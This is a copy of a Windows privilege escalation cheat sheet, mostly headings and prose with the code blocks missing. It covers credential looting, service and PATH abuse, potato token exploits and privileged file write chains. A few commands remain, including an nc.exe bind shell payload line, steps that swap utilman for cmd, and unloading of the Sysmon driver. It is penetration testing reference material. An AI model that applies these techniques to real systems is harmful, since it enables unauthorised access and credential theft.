Windows
Windows - Privilege Escalation
Summary
Tools
Windows Version and Configuration
User Enumeration
Network Enumeration
Antivirus Enumeration
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
HiveNightmare
LAPS Settings
Search for file contents
Search for a file with a certain filename
Search the registry for key names and passwords
Passwords in unattend.xml
Wifi passwords
Sticky Notes passwords
Passwords stored in services
Passwords stored in Key Manager
Powershell History
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
EoP - Incorrect permissions in services
EoP - Windows Subsystem for Linux (WSL)
EoP - Unquoted Service Paths
EoP - $PATH Interception
EoP - Named Pipes
EoP - Kernel Exploitation
EoP - Microsoft Windows Installer
AlwaysInstallElevated
CustomActions
EoP - Insecure GUI apps
EoP - Evaluating Vulnerable Drivers
EoP - Printers
Universal Printer
Bring Your Own Vulnerability
EoP - Runas
EoP - Abusing Shadow Copies
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
EoP - Impersonation Privileges
Restore A Service Account's Privileges
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Juicy Potato (Abusing the golden privileges)
Rogue Potato (Fake OXID Resolver))
EFSPotato (MS-EFSR EfsRpcOpenFileRaw))
PrintSpoofer (Printer Bug)))
EoP - Privileged File Write
DiagHub
UsoDLLLoader
WerTrigger
WerMgr
EoP - Privileged File Delete
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
MS10-015 (KiTrap0D)
MS11-080 (adf.sys)
MS15-051 (Client Copy Image)
MS16-032
MS17-010 (Eternal Blue)
CVE-2019-1388
EoP - $PATH Interception
References
Tools
Windows Version and Configuration
Extract patchs and updates
Architecture
List all env variables
List all drives
User Enumeration
Get current username
List user privilege
List all users
List logon requirements; useable for bruteforcing
Get details about a user (i.e. administrator, admin, current user)
List all local groups
Get details about a group (i.e. administrators)
Get Domain Controllers
Network Enumeration
List all network interfaces, IP, and DNS.
List current routing table
List the ARP table
List all current connections
List all network shares
SNMP Configuration
Antivirus Enumeration
Enumerate antivirus on a box with WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
Generate a hash file for John using pwdump
or samdump2
.
Either crack it with john -format=NT /root/sam.txt
, hashcat or use Pass-The-Hash.
HiveNightmare
CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user
Check for the vulnerability using icacls
Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
LAPS Settings
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd
from Windows Registry.
LAPS Enabled: AdmPwdEnabled
LAPS Admin Account Name: AdminAccountName
LAPS Password Complexity: PasswordComplexity
LAPS Password Length: PasswordLength
LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
Search for file contents
Also search in remote places such as SMB Shares and SharePoint:
Search passwords in SharePoint: nheiniger/SnaffPoint (must be compiled first, for referencing issue see: https://github.com/nheiniger/SnaffPoint/pull/6)
Search passwords in SMB Shares: SnaffCon/Snaffler
Search for a file with a certain filename
Search the registry for key names and passwords
Passwords in unattend.xml
Location of the unattend.xml files.
Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
.
Example content
Unattend credentials are stored in base64 and can be decoded manually with base64.
The Metasploit module post/windows/gather/enum_unattend
looks for these files.
IIS Web config
Other files
Wifi passwords
Find AP SSID
Get Cleartext Pass
Oneliner method to extract wifi passwords from all the access point.
Sticky Notes passwords
The sticky notes app stores it's content in a sqlite db located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Passwords stored in services
Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
Passwords stored in Key Manager
⚠️ This software will display its output in a GUI
Powershell History
Disable Powershell history: Set-PSReadlineOption -HistorySaveStyle SaveNothing
.
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
What processes are running?
Which processes are running as "system"
Do you have powershell magic?
List installed programs
List services
Enumerate scheduled tasks
Startup tasks
EoP - Incorrect permissions in services
A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
Often, services are pointing to writeable locations:
Orphaned installs, not installed anymore but still exist in startup
DLL Hijacking
PATH directories with weak permissions
Alternatively you can use the Metasploit exploit : exploit/windows/local/service_permissions
Note to check file permissions you can use cacls
and icacls
icacls (Windows Vista +) cacls (Windows XP)
You are looking for BUILTIN\Users:(F)
(Full access), BUILTIN\Users:(M)
(Modify access) or BUILTIN\Users:(W)
(Write-only access) in the output.
Example with Windows 10 - CVE-2019-1322 UsoSvc
Prerequisite: Service account
Example with Windows XP SP1 - upnphost
If it fails because of a missing dependency, try the following commands.
Using accesschk
from Sysinternals or accesschk-XP.exe - github.com/phackt
EoP - Windows Subsystem for Linux (WSL)
Technique borrowed from Warlockobama's tweet
With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse.
Binary bash.exe
can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe
Alternatively you can explore the WSL
filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\
EoP - Unquoted Service Paths
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
Metasploit exploit :
exploit/windows/local/trusted_service_path
PowerUp exploit
Example
For C:\Program Files\something\legit.exe
, Windows will try the following paths first:
C:\Program.exe
C:\Program Files.exe
EoP - $PATH Interception
Requirements:
PATH contains a writeable folder with low privileges.
The writeable folder is before the folder that contains the legitimate binary.
EXAMPLE:
Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder.
EoP - Named Pipes
Find named pipes:
[System.IO.Directory]::GetFiles("\\.\pipe\")
Check named pipes DACL:
pipesec.exe <named_pipe>
Reverse engineering software
Send data throught the named pipe :
program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe
EoP - Kernel Exploitation
List of exploits kernel : https://github.com/SecWiki/windows-kernel-exploits
#Security Bulletin #KB #Description #Operating System
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008)
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2)
CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS16-014 [K3134228] [remote code execution] (2008/Vista/7) ...
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
To cross compile a program from Kali, use the following command.
EoP - Microsoft Windows Installer
AlwaysInstallElevated
Using the reg query
command, you can check the status of the AlwaysInstallElevated
registry key for both the user and the machine. If both queries return a value of 0x1
, then AlwaysInstallElevated
is enabled for both user and machine, indicating the system is vulnerable.
Shell command
PowerShell command
Then create an MSI package and install it.
Technique also available in :
Metasploit :
exploit/windows/local/always_install_elevated
PowerUp.ps1 :
Get-RegistryAlwaysInstallElevated
,Write-UserAddMSI
CustomActions
Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file.
Enumerate products on the machine
Execute the repair process with the /fa
parameter to trigger the CustomActions. We can use both IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1}
or path to the installer c:\windows\installer\XXXXXXX.msi
. The repair will run with the NT SYSTEM account.
Common mistakes in MSI installers:
Missing quiet parameters: it will spawn
conhost.exe
asNT SYSTEM
. Use[CTRL]+[A]
to select some text in it, it will pause the execution.conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –> cmd.exe
GUI with direct actions: open a URL and start the browser then use the same scenario.
Binaries/Scripts loaded from user writable paths: you might need to win the race condition.
DLL hijacking/search order abusing
PowerShell
-NoProfile
missing: Add custom commands into your profile
EoP - Insecure GUI apps
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
EoP - Evaluating Vulnerable Drivers
Look for vuln drivers loaded, we often don't spend enough time looking at this:
Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats.
Native binary: DriverQuery.exe
EoP - Printers
Universal Printer
Create a Printer
Execute the driver
PrinterNightmare
Bring Your Own Vulnerability
Concealed Position : https://github.com/jacob-baines/concealed_position
ACIDDAMAGE - CVE-2021-35449 - Lexmark Universal Print Driver LPE
RADIANTDAMAGE - CVE-2021-38085 - Canon TR150 Print Driver LPE
POISONDAMAGE - CVE-2019-19363 - Ricoh PCL6 Print Driver LPE
SLASHINGDAMAGE - CVE-2020-1300 - Windows Print Spooler LPE
EoP - Runas
Use the cmdkey
to list the stored credentials on the machine.
Then you can use runas
with the /savecred
options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.
Using runas
with a provided set of credential.
EoP - Abusing Shadow Copies
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/
The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.
A LOLBin/Lib/Script must:
Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra "unexpected" functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses
Have functionality that would be useful to an APT or red team
EoP - Impersonation Privileges
Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
SeAssignPrimaryToken
Admin
3rd party tool
"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"
Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon.
SeBackup
Threat
Built-in commands
Read sensitve files with robocopy /b
- May be more interesting if you can read %WINDIR%\MEMORY.DMP
- SeBackupPrivilege
(and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with /b parameter.
SeCreateToken
Admin
3rd party tool
Create arbitrary token including local admin rights with NtCreateToken
.
SeLoadDriver
Admin
3rd party tool
1. Load buggy kernel driver such as szkg64.sys
or capcom.sys
2. Exploit the driver vulnerability
Alternatively, the privilege may be used to unload security-related drivers with ftlMC
builtin command. i.e.: fltMC sysmondrv
1. The szkg64
vulnerability is listed as CVE-2018-15732
2. The szkg64
exploit code was created by Parvez Anwar
SeRestore
Admin
PowerShell
1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U
Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTakeOwnership
Admin
Built-in commands
1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTcb
Admin
3rd party tool
Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified.
SeRelabel
Admin
3rd party too
Allows you to own resources that have an integrity level even higher than your own
Restore A Service Account's Privileges
This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Binary available at : foxglovesec/RottenPotato and breenmachine/RottenPotatoNG
Exploit using Metasploit with
incognito mode
loaded.
Juicy Potato (Abusing the golden privileges)
If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
Binary available at : ohpe/juicy-potato
Check the privileges of the service account, you should look for SeImpersonate and/or SeAssignPrimaryToken (Impersonate a client after authentication)
Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
Execute JuicyPotato to run a privileged command.
Rogue Potato (Fake OXID Resolver)
Binary available at antonioCoco/RoguePotato
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
Binary available at https://github.com/zcgonvh/EfsPotato
JuicyPotatoNG
PrintSpoofer (Printer Bug)
this work if SeImpersonatePrivilege is enabled
Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
EoP - Privileged File Write
DiagHub
⚠️ Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the C:\Windows\System32
directory.
Exploit
Create an evil DLL e.g: payload.dll and move it into
C:\Windows\System32
Build https://github.com/xct/diaghub
diaghub.exe c:\\ProgramData\\ payload.dll
The default payload will run C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe
Alternative tools:
https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
https://github.com/decoder-it/diaghub_exploit
UsoDLLLoader
⚠️ 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of windowscoredeviceinfo.dll
into C:\Windows\Sytem32\
and then have it loaded by the USO service to get arbitrary code execution as NT AUTHORITY\System.
Exploit
Build https://github.com/itm4n/UsoDllLoader
Select Release config and x64 architecure.
Build solution.
DLL .\x64\Release\WindowsCoreDeviceInfo.dll
Loader .\x64\Release\UsoDllLoader.exe.
Copy
WindowsCoreDeviceInfo.dll
toC:\Windows\System32\
Use the loader and wait for the shell or run
usoclient StartInteractiveScan
and connect to the bind shell on port 1337.
WerTrigger
Exploit Privileged File Writes bugs with Windows Problem Reporting
Clone https://github.com/sailay1996/WerTrigger
Copy
phoneinfo.dll
toC:\Windows\System32\
Place
Report.wer
file andWerTrigger.exe
in a same directory.Then, run
WerTrigger.exe
.Enjoy a shell as NT AUTHORITY\SYSTEM
WerMgr
Exploit Privileged Directory Creation Bugs with Windows Error Reporting
Clone https://github.com/binderlabs/DirCreate2System
Create directory
C:\Windows\System32\wermgr.exe.local\
Grant access to it:
cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f
Place
spawn.dll
file anddircreate2system.exe
in a same directory and run.\dircreate2system.exe
.Enjoy a shell as NT AUTHORITY\SYSTEM
EoP - Privileged File Delete
During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create:
a folder at
C:\Config.Msi
containinga rollback script (
.rbs
)a rollback file (
.rbf
)
To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service.
delete the protected
C:\Config.Msi
folder immediately after it's created by the Windows Installerrecreate the
C:\Config.Msi
folder with weak DACL permissions since ordinary users are allowed to create folders at the root ofC:\
.drop malicious
.rbs
and.rbf
files into it to be executed by the MSI rollbackthen upon rollback, Windows Installer will make arbitrary changes to the system
The easiest way to trigger this chain is using thezdi/FilesystemEoPs/FolderOrFileDeleteToSystem. The exploit contains a .msi file with 2 actions, the first one produces a delay and the second throws an error to make it rollback. This rollback will "restore" a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll
.
Then switch to the secure desktop using [CTRL]+[ALT]+[DELETE]
and open the On-Screen Keyboard (osk.exe
). The osk.exe
process first looks for the C:\Program Files\Common Files\microsoft shared\ink\HID.dll
library instead of C:\Windows\System32\HID.dll
EoP - Common Vulnerabilities and Exposure
MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
Metasploit modules to exploit MS08-067 NetAPI
.
If you can't use Metasploit and only want a reverse shell.
MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
MS11-080 (afd.sys) - Microsoft Windows XP/2003
MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : wmic qfe list | findstr "3139914"
MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script or netexec: netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010
.
Metasploit modules to exploit EternalRomance/EternalSynergy/EternalChampion
.
If you can't use Metasploit and only want a reverse shell.
CVE-2019-1388
Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html
Requirement:
Windows 7
Windows 10 LTSC 10240
Failing on :
LTSC 2019
1709
1803
Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
References
Last updated